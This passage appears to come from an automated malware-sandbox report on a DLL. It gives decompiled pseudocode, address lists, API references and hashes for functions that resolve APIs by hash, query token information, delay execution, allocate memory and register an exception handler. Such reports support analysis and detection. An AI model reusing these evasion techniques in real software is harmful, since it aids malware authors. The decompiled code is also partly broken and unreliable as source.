					if( *(_t429 + 0x1a0) != 0) {
						E6E86F584(_t429 + 0x3c, _t262);
						_t265 = E6E87306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
						_t407 = _t265;
						__eflags = _t265;
						if(_t265 == 0) {
							L107:
							E6E86F654(_t429 + 0x38);
							goto L10;
						}
						_t268 = E6E86F4BC(_t429 + 0x3c, 0);
						_t271 = GetTokenInformation( *(_t429 + 0x1a8), 2, _t268, E6E86F4CC(_t429 + 0x38), _t429 + 0x1a0); // executed
						__eflags = _t271;
						if(_t271 == 0) {
							_t272 = E6E8735F0(_t407);
							__eflags = _t272;
							if(_t272 != 0) {
								goto L107;
							}
						}
						_t427 = E6E86F4BC(_t429 + 0x3c, 0);
						 *(_t429 + 0x1d8 - 0x30) = 0;
						asm("movsd");
						asm("movsb");
						asm("movsb");
						_t407 = E6E87306C(0x150c05fc, 0x2351aaca, 0x150c05fc, 0x150c05fc);
						__eflags = _t407;
						if(_t407 == 0) {
							goto L107;
						}
						_t276 = _t429 + 0x1a8;
						_t277 =  *_t407(_t276 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t276);
						__eflags = _t277;
						if(_t277 == 0) {
							_t278 = E6E8735F0(_t407);
							__eflags = _t278;
							if(_t278 != 0) {
								goto L107;
							}
						}
						_t403 =  *(_t429 + 0x1a8);
						__eflags =  *_t427;
						if( *_t427 <= 0) {
							L101:
							__eflags = _t403;
							if(_t403 == 0) {
								L103:
								_t393 = 1;
								L105:
								__eflags = _t393;
								if(_t393 == 0) {
									E6E870FD4(_t403, _t407, _t403);
								}
								goto L107;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t393 = 0;
								__eflags = 0;
								goto L105;
							}
							goto L103;
						}
						_t413 = 0;
						__eflags = 0;
						do {
							_t282 = E6E87306C(0x150c05fc, 0xb4757511, 0x150c05fc, 0x150c05fc);
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							_push( *((intOrPtr*)(_t427 + 4 + _t413 * 8)));
							_push( *(_t429 + 0x1ac));
							asm("int3");
							asm("int3");
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							__eflags = _t403;
							if(_t403 == 0) {
								L93:
								_t395 = 1;
								L95:
								__eflags = _t395;
								if(_t395 == 0) {
									E6E870FD4(_t403, _t413, _t403);
								}
								E6E86F654(_t429 + 0x38);
								__eflags =  *((char*)(_t429 + 0x18));
								if( *((char*)(_t429 + 0x18)) != 0) {
									E6E86BB44(_t429 + 0x14);
								}
								_t364 = 1;
								goto L13;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t395 = 0;
								__eflags = 0;
								goto L95;
							}
							goto L93;
							L100:
							_t413 = _t413 + 1;
							__eflags = _t413 -  *_t427;
						} while (_t413 <  *_t427);
						goto L101;
					}
					L10:
					if( *((char*)(_t429 + 0x18)) != 0) {
						E6E86BB44(_t429 + 0x14);
					}
					goto L12;
				} else {
					return _t155;
				}
			}

0x6e87073f
0x6e870741
0x6e870748
0x6e870fc7
0x6e870fcd
0x6e870fcd
0x6e870752
0x6e87075e
0x6e87076a
0x6e87076f
0x6e87077c
0x6e87078d
0x6e87078f
0x6e870790
0x6e870791
0x6e870791
0x6e870792
0x6e870796
0x6e87079a
0x6e87079f
0x6e8707a2
0x6e8707a8
0x6e8707c2
0x6e8707c9
0x6e8707cc
0x6e8707cf
0x6e8707d1
0x6e8707dd
0x6e8707ea
0x6e8707f7
0x6e8707fb
0x6e870887
0x6e870887
0x6e870889
0x6e87088d
0x6e870898
0x6e8708ae
0x6e8708b1
0x6e8708b1
0x6e8708b5
0x6e8708be
0x6e8708c3
0x6e8708c3
0x6e8708c5
0x6e8708d6
0x6e8708f8
0x6e8708fa
0x6e8708fb
0x6e8708ff
0x6e8708ff
0x6e870908
0x6e870914
0x6e87091d
0x6e870933
0x6e870943
0x6e870948
0x6e87094c
0x6e870951
0x6e870953
0x6e8709a3
0x6e8709b8
0x6e8709bc
0x6e8709c1
0x6e8709d2
0x6e8709e7
0x6e8709eb
0x6e8709f0
0x6e8709f2
0x6e870a39
0x6e870a3c
0x6e870a8a
0x6e870a8d
0x6e870ace
0x6e870ad2
0x6e870ad7
0x6e870adc
0x6e870afb
0x6e870afb
0x6e870afb
0x6e870afd
0x00000000
0x6e870afd
0x6e870ade
0x6e870ae2
0x6e870ae4
0x6e870aeb
0x6e870aeb
0x6e870af1
0x6e870af1
0x6e870af3
0x6e870af6
0x6e870af6
0x00000000
0x6e870af3
0x6e870ae6
0x6e870ae9
0x6e870aef
0x6e870aef
0x00000000
0x6e870aef
0x00000000
0x6e870ae9
0x6e870a8f
0x6e870a92
0x00000000
0x00000000
0x6e870a98
0x6e870a9d
0x6e870aa2
0x6e870ac1
0x6e870ac1
0x6e870acb
0x00000000
0x6e870acb
0x6e870aa4
0x6e870aa8
0x6e870aaa
0x6e870ab1
0x6e870ab1
0x6e870ab7
0x6e870ab7
0x6e870ab9
0x6e870abc
0x6e870abc
0x00000000
0x6e870ab9
0x6e870aac
0x6e870aaf
0x6e870ab5
0x6e870ab5
0x00000000
0x6e870ab5
0x00000000
0x6e870aaf
0x6e870a3e
0x6e870a40
0x6e870a7f
0x6e870a82
0x6e870df4
0x6e870df9
0x6e870dfe
0x6e870e1d
0x6e870e1d
0x6e870e27
0x00000000
0x6e870e27
0x6e870e00
0x6e870e04
0x6e870e06
0x6e870e0d
0x6e870e0d
0x6e870e13
0x6e870e13
0x6e870e15
0x6e870e18
0x6e870e18
0x00000000
0x6e870e15
0x6e870e08
0x6e870e0b
0x6e870e11
0x6e870e11
0x00000000
0x6e870e11
0x00000000
0x6e870e0b
0x00000000
0x6e870a88
0x6e870a46
0x6e870a4b
0x6e870a50
0x6e870a6f
0x6e870a6f
0x6e870a79
0x00000000
0x6e870a79
0x6e870a52
0x6e870a56
0x6e870a58
0x6e870a5f
0x6e870a5f
0x6e870a65
0x6e870a65
0x6e870a67
0x6e870a6a
0x6e870a6a
0x00000000
0x6e870a67
0x6e870a5a
0x6e870a5d
0x6e870a63
0x6e870a63
0x00000000
0x6e870a63
0x00000000
0x6e870a5d
0x6e8709f4
0x6e8709f6
0x00000000
0x00000000
0x6e870a00
0x6e870a05
0x6e870a0a
0x6e870a29
0x6e870a29
0x6e870a33
0x00000000
0x6e870a33
0x6e870a0c
0x6e870a10
0x6e870a12
0x6e870a19
0x6e870a19
0x6e870a1f
0x6e870a1f
0x6e870a21
0x6e870a24
0x6e870a24
0x00000000
0x6e870a21
0x6e870a14
0x6e870a17
0x6e870a1d
0x6e870a1d
0x00000000
0x6e870a1d
0x00000000
0x6e870a17
0x6e870959
0x6e87095e
0x6e870963
0x6e870982
0x6e870982
0x6e87098c
0x00000000
0x6e87098c
0x6e870965
0x6e870969
0x6e87096b
0x6e870972
0x6e870972
0x6e870978
0x6e870978
0x6e87097a
0x6e87097d
0x6e87097d
0x00000000
0x6e87097a
0x6e87096d
0x6e870970
0x6e870976
0x6e870976
0x00000000
0x6e870976
0x00000000
0x6e87089a
0x6e87089c
0x6e870b01
0x6e870b06
0x6e870b09
0x6e870b0e
0x6e870b10
0x6e870b25
0x6e870b28
0x6e870bf6
0x6e870bfe
0x6e870c01
0x6e870c16
0x6e870c20
0x6e870c20
0x6e870c22
0x6e870c24
0x6e870c33
0x6e870c3f
0x6e870c43
0x6e870c46
0x6e870c49
0x6e870c4c
0x00000000
0x6e870c4c
0x6e870b38
0x6e870b4a
0x6e870b4e
0x6e870bda
0x6e870bda
0x6e870be0
0x6e870beb
0x6e870be2
0x6e870be2
0x6e870be2
0x00000000
0x6e870be0
0x6e870b5b
0x6e870b5c
0x6e870b5e
0x6e870b64
0x6e870fb3
0x6e870fb8
0x6e870fba
0x00000000
0x00000000
0x6e870fc0
0x6e870b7b
0x6e870b7f
0x6e870b84
0x6e870b96
0x6e870b9a
0x6e870ba5
0x6e870ba6
0x6e870ba7
0x6e870ba8
0x6e870baa
0x6e870bb5
0x6e870e2d
0x6e870e2d
0x6e870bb5
0x6e870bbb
0x6e870bc4
0x6e870e3f
0x6e870e55
0x6e870e57
0x6e870e59
0x6e870f94
0x6e870f9b
0x00000000
0x6e870f9b
0x6e870e68
0x6e870e76
0x6e870e90
0x6e870e92
0x6e870e94
0x6e870fa5
0x6e870faa
0x6e870fac
0x00000000
0x00000000
0x6e870fae
0x6e870ea8
0x6e870eb3
0x6e870ec2
0x6e870ed4
0x6e870ed6
0x6e870ed8
0x6e870ee5
0x6e870ee5
0x6e870ef5
0x6e870f06
0x6e870f0b
0x6e870f0d
0x6e870f0f
0x6e870f16
0x6e870f17
0x6e870f17
0x6e870f23
0x6e870f44
0x6e870f4d
0x6e870f59
0x6e870f65
0x6e870f6a
0x6e870f6f
0x6e870f75
0x6e870f75
0x6e870f7a
0x6e870f80
0x00000000
0x6e870f86
0x6e870f88
0x00000000
0x6e870f88
0x6e870bca
0x6e870bca
0x6e870bcf
0x6e870bd5
0x6e870bd5
0x00000000
0x6e870bcf
0x6e870bc4
0x6e870898
0x6e870808
0x6e870809
0x6e87080b
0x6e870811
0x6e870dde
0x6e870de3
0x6e870de5
0x00000000
0x00000000
0x6e870deb
0x6e870828
0x6e87082c
0x6e870831
0x6e870847
0x6e87085e
0x6e870862
0x6e870c5a
0x6e870c5a
0x6e870862
0x6e870868
0x6e870871
0x6e870c69
0x6e870c7a
0x6e870c7f
0x6e870c81
0x6e870c83
0x6e870db4
0x6e870db8
0x00000000
0x6e870db8
0x6e870c8f
0x6e870cb4
0x6e870cb6
0x6e870cb8
0x6e870dd0
0x6e870dd5
0x6e870dd7
0x00000000
0x00000000
0x6e870dd9
0x6e870cc9
0x6e870cd7
0x6e870cde
0x6e870cdf
0x6e870ce0
0x6e870cf2
0x6e870cf4
0x6e870cf6
0x00000000
0x00000000
0x6e870cfe
0x6e870d19
0x6e870d1b
0x6e870d1d
0x6e870dc2
0x6e870dc7
0x6e870dc9
0x00000000
0x00000000
0x6e870dcb
0x6e870d23
0x6e870d2a
0x6e870d2e
0x6e870d99
0x6e870d99
0x6e870d9b
0x6e870da2
0x6e870da2
0x6e870da8
0x6e870da8
0x6e870daa
0x6e870daf
0x6e870daf
0x00000000
0x6e870daa
0x6e870d9d
0x6e870da0
0x6e870da6
0x6e870da6
0x00000000
0x6e870da6
0x00000000
0x6e870da0
0x6e870d30
0x6e870d30
0x6e870d32
0x6e870d3e
0x6e870d43
0x6e870d45
0x00000000
0x00000000
0x6e870d47
0x6e870d4b
0x6e870d52
0x6e870d53
0x6e870d54
0x6e870d56
0x00000000
0x00000000
0x6e870d58
0x6e870d5a
0x6e870d61
0x6e870d61
0x6e870d67
0x6e870d67
0x6e870d69
0x6e870d6e
0x6e870d6e
0x6e870d77
0x6e870d7c
0x6e870d81
0x6e870d87
0x6e870d87
0x6e870d8c
0x00000000
0x6e870d8c
0x6e870d5c
0x6e870d5f
0x6e870d65
0x6e870d65
0x00000000
0x6e870d65
0x00000000
0x6e870d93
0x6e870d93
0x6e870d94
0x6e870d94
0x00000000
0x6e870d32
0x6e870877
0x6e87087c
0x6e870882
0x6e870882
0x00000000
0x6e870c59
0x6e870c59
0x6e870c59

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,150C05FC,150C05FC), ref: 6E87085E
GetSystemInfo.KERNELBASE(?,8E844D1E,8E844D1E,?,?,360D0C74,?,?,1E55AAEC,?,?,C0092A94,00000000,80000002,00000000,-000000FC), ref: 6E870C20
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,150C05FC,150C05FC,00000000,150C05FC,150C05FC), ref: 6E870CB4

Memory Dump Source

Source File: 00000001.00000002.778004464.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000001.00000002.777996746.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778040396.000000006E87A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778053025.000000006E87D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.778061208.000000006E87F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID:
API String ID: 298373132-0
Opcode ID: 2d9299c4c1676ad1cc9e25d2bcc0e749f525982b1c81e05497a4826a13b5d6ef
Instruction ID: a4d91e30c3fcf089272c5021a04caee7826aadf0e534e18a83b99f0ba2a69b2a
Opcode Fuzzy Hash: 2d9299c4c1676ad1cc9e25d2bcc0e749f525982b1c81e05497a4826a13b5d6ef
Instruction Fuzzy Hash: CC22C370648341AFEF71DBA8C850BDF77A9AF92308F108D1CA894972D5EB72D905CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E872234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E6E872234(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E6E873AF8(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E6E87306C(0x60a28c5c, 0x11cab064, 0x60a28c5c, 0x60a28c5c);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x6e872234
0x6e872238
0x6e872254
0x6e872257
0x6e87223a
0x6e872249
0x6e87224c
0x6e87224c
0x6e872267
0x6e87226c
0x6e872270
0x6e872278
0x6e872278
0x6e87227c

APIs

NtDelayExecution.NTDLL(00000000,00000000,60A28C5C,60A28C5C,FFFFFFFF,FFFFFFFF,6E864B17,00000000,00000000,?), ref: 6E872278

Memory Dump Source

Source File: 00000001.00000002.778004464.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000001.00000002.777996746.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778040396.000000006E87A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778053025.000000006E87D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.778061208.000000006E87F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction ID: 056cbac297cd290294171f4f18bd38d5682269c2defdeefc0ba33406dadfa427
Opcode Fuzzy Hash: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction Fuzzy Hash: 8DE065B011E302AEEF64D66D9C05B6F76D8AF85610F208D2CB5A8D72C4E674D8018361

Uniqueness

Uniqueness Score: -1.00%

Function 6E872820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E872820(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E6E87306C(0x60a28c5c, 0x414fdf7, 0x60a28c5c, 0x60a28c5c) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x6e872827
0x6e872830
0x6e87283e
0x6e872861
0x6e872861
0x6e872840
0x6e872857
0x6e87285b
0x00000000
0x6e87285d
0x6e87285d
0x6e87285d
0x6e87285b
0x6e872866

APIs

NtAllocateVirtualMemory.NTDLL(6E8788E6,?,00000000,000000FF,6E8788E6,6E8788E6,60A28C5C,60A28C5C,?,?,6E8788E6,00003000,00000004,000000FF), ref: 6E872857

Memory Dump Source

Source File: 00000001.00000002.778004464.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000001.00000002.777996746.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778040396.000000006E87A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778053025.000000006E87D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.778061208.000000006E87F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction ID: c3a285c315b8c3a664197bdd6d02c8225bf74154f54592d89d09b83c7fbf8d5c
Opcode Fuzzy Hash: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction Fuzzy Hash: ECE039B1209342AFEF18CA99CC24E6FB7E9EF85604F108C2DB4A4D6250D735D8009722

Uniqueness

Uniqueness Score: -1.00%

Function 6E873138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6E873138(intOrPtr* __ecx) {
				void* _t1;

				_push(E6E8734B0);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x6e873138
0x6e87313d
0x6e87313f
0x6e873141

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,6E8734B0,6E873128,60A28C5C,60A28C5C,?,6E866C99,00000000), ref: 6E87313F

Memory Dump Source

Source File: 00000001.00000002.778004464.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000001.00000002.777996746.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778040396.000000006E87A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778053025.000000006E87D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.778061208.000000006E87F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: 7c2771635c03292bfdf6b807afda672cc6f70232fba5ba11b4d24bfdda17dd73
Instruction ID: d073d564e58ee2c149c98ed8ff4d78b37854d43eaee0ad30d013e5d60e2f7698
Opcode Fuzzy Hash: 7c2771635c03292bfdf6b807afda672cc6f70232fba5ba11b4d24bfdda17dd73
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6E8710A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6E8710A4(void* __ebx, void* __ecx) {
				intOrPtr* _t34;
				long* _t55;
				long* _t59;
				intOrPtr* _t64;
				void* _t73;
				void* _t74;
				void* _t79;
				long* _t80;

				_t74 = __ecx;
				_t80[7] = 0;
				_t64 = E6E87306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t64 != 0) {
					 *_t64(_t74, 8,  &(_t80[7]));
				}
				_t55 = _t80;
				 *_t55 = _t80[7];
				_t55[1] = 1;
				if(E6E86C280(_t55) != 0) {
					L6:
					if(_t80[1] != 0) {
						E6E86BB44(_t80);
					}
					return 0;
				}
				_t80[6] = 0;
				if(E6E87306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
					GetTokenInformation(_t80[4], 0x19, 0, 0,  &(_t80[6])); // executed
				}
				_t30 = _t80[6];
				if(_t80[6] != 0) {
					E6E86F584( &(_t80[3]), _t30);
					_t59 =  &(_t80[3]);
					_t73 = E6E86F4BC(_t59, 0);
					_t34 = E6E87306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
					if (_t34 == 0) goto L33;
					 *_t34 =  *_t34 + _t34;
					 *((intOrPtr*)(_t79 + 0x50182444)) =  *((intOrPtr*)(_t79 + 0x50182444)) + _t59;
				} else {
					goto L6;
				}
			}

0x6e8710b3
0x6e8710b5
0x6e8710c4
0x6e8710c8
0x6e8710d2
0x6e8710d2
0x6e8710d8
0x6e8710db
0x6e8710dd
0x6e8710e8
0x6e871122
0x6e871127
0x6e87112c
0x6e87112c
0x00000000
0x6e871131
0x6e8710f4
0x6e871107
0x6e871118
0x6e871118
0x6e87111a
0x6e871120
0x6e87113e
0x6e871145
0x6e87114e
0x6e87115c
0x6e871165
0x6e871168
0x6e87116a
0x00000000
0x00000000
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6E871118
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6E87117B

Memory Dump Source

Source File: 00000001.00000002.778004464.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000001.00000002.777996746.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778040396.000000006E87A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778053025.000000006E87D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.778061208.000000006E87F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: d4114acdae47b760778368f229c105cfa951edf473a092887fb2ca255ca5d737
Instruction ID: 1a8a55a012aeb30a408d8a8cf05b9345a5adbce05505fcd2ed6e92cc9e7e3cab
Opcode Fuzzy Hash: d4114acdae47b760778368f229c105cfa951edf473a092887fb2ca255ca5d737
Instruction Fuzzy Hash: 5B41F570244242AFEF65D9EC9870BAF77DC9B92704F108C28B9A0CA5D4DB20CC49C762

Uniqueness

Uniqueness Score: -1.00%

Function 6E8757B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6E8757B4(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E6E873064(0x150c05fc, 0x545b7fe2) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E6E86F828(_a8, _t15);
							if(E6E873064(0x150c05fc, 0x545b7fe2) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E6E86F4BC(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x6e8757b8
0x6e8757b9
0x6e8757bb
0x6e8757c0
0x6e8757c7
0x6e8757cb
0x6e8757cb
0x6e8757cb
0x6e8757cf
0x6e875815
0x6e875815
0x6e8757d1
0x6e8757d1
0x6e8757d7
0x6e8757e0
0x6e8757e3
0x6e8757fa
0x6e87580b
0x6e87580b
0x6e87580d
0x6e875813
0x6e87581e
0x6e875836
0x6e875856
0x6e875856
0x6e875858
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e8757d7
0x6e875860

APIs

RegQueryValueExA.KERNELBASE(?,6E87D1F8,00000000,?,00000000,00000000,?,?,?,6E87D1F8,?,6E875887,?,00000000,00000000), ref: 6E87580B
RegQueryValueExA.KERNELBASE(?,6E87D1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,6E87D1F8,?,6E875887,?,00000000), ref: 6E875856

Memory Dump Source

Source File: 00000001.00000002.778004464.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000001.00000002.777996746.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778040396.000000006E87A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778053025.000000006E87D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.778061208.000000006E87F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction ID: c8b38a7bb98a045790752f379aed4272b3540596f86578b595949e9a2dd4f799
Opcode Fuzzy Hash: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction Fuzzy Hash: A1116D3120D306ABDB60DAA99C90EAFBBDCEF46754F108D1DB49897181EB31E800CA61

Uniqueness

Uniqueness Score: -1.00%

Function 6E875B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6E875B3C(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t30;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t55;
				WCHAR** _t56;
				char* _t59;
				long _t60;

				_t56 = __ecx;
				_t37 = _a8;
				if(E6E86D1CC(__ecx, 0x2f) != 0) {
					_t58 = _t60;
					E6E86D6D0(__ecx, _t60);
					E6E86CFF8(_t56,  *_t60);
					E6E86CFDC(_t60);
				}
				if(_t37 == 0) {
					_t64 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E6E8762B0(_t64);
				if(_a4 > 5) {
					_t58 = 0;
					if(_t37 != 2) {
						_t16 = 3;
						__eflags = _t37 - 1;
						_t38 = 0;
						_t39 =  ==  ? _t16 : _t38;
					} else {
						_t39 = 1;
					}
					if(E6E873064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t30 = CreateFileW( *_t56, 0, _t39, 0, _t58, _a12, 0); // executed
						_push(_t30);
					}
					_t40 =  &(_t56[3]);
					E6E86C26C(_t40);
					if(E6E86C280(_t40) != 0) {
						_t56[2] = E6E8735F0(0);
						return 0;
					} else {
						if(_a4 == 2) {
							_t55 = E6E873064(0x8e844d1e, 0xba53868);
							__eflags = _t55;
							if(_t55 != 0) {
								 *_t55( *_t40, 0, 0, 2);
							}
						}
						_t59 =  &_v24;
						E6E873698(_t59, 0xff, 8);
						if(E6E873064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t59);
							_push(_t59);
							_push(0);
							_push( *_t40);
							asm("int3");
							asm("int3");
						}
						return 1;
					}
				} else {
					goto __eax;
				}
			}

0x6e875b43
0x6e875b45
0x6e875b52
0x6e875b56
0x6e875b5a
0x6e875b64
0x6e875b6b
0x6e875b6b
0x6e875b72
0x6e875b74
0x6e875b79
0x6e875b82
0x6e875b8a
0x6e875b8a
0x6e875b7b
0x6e875b7d
0x6e875b7d
0x6e875b79
0x6e875b8f
0x6e875b9b
0x6e875ccc
0x6e875c09
0x6e875c12
0x6e875c13
0x6e875c18
0x6e875c19
0x6e875c0b
0x6e875c0d
0x6e875c0d
0x6e875c2f
0x6e875c43
0x6e875c31
0x6e875c3e
0x6e875c40
0x6e875c40
0x6e875c45
0x6e875c4a
0x6e875c58
0x6e875cc3
0x00000000
0x6e875c5a
0x6e875c5f
0x6e875cac
0x6e875cae
0x6e875cb0
0x6e875cba
0x6e875cba
0x6e875cb0
0x6e875c61
0x6e875c6d
0x6e875c86
0x6e875c88
0x6e875c89
0x6e875c8a
0x6e875c8c
0x6e875c8e
0x6e875c8f
0x6e875c8f
0x00000000
0x6e875c92
0x6e875ba1
0x6e875bb1
0x6e875bb1

Memory Dump Source

Source File: 00000001.00000002.778004464.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000001.00000002.777996746.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778040396.000000006E87A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778053025.000000006E87D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.778061208.000000006E87F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b5312cd6805c095b4233935c2788ca4b250092195f5ac29236b66316d351b67
Instruction ID: 4883fef89e6087d0efdbc90aac2bc7a8f8f6eaa98a718f34a4f8aecc7ba36d4f
Opcode Fuzzy Hash: 4b5312cd6805c095b4233935c2788ca4b250092195f5ac29236b66316d351b67
Instruction Fuzzy Hash: B231E13024430ABFEFA06BF94D98F7F769DDBC1648F144C39EA419A1C5DF619904C262

Uniqueness

Uniqueness Score: -1.00%

Function 6E871166, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E871166(intOrPtr* __eax, void* __ebx, void* __ecx) {
				void* _t20;

				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(_t20 + 0x50182444)) =  *((intOrPtr*)(_t20 + 0x50182444)) + __ecx;
			}

0x6e871168
0x6e87116a

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6E87117B

Memory Dump Source

Source File: 00000001.00000002.778004464.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000001.00000002.777996746.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778040396.000000006E87A000.00000002.00020000.sdmp Download File
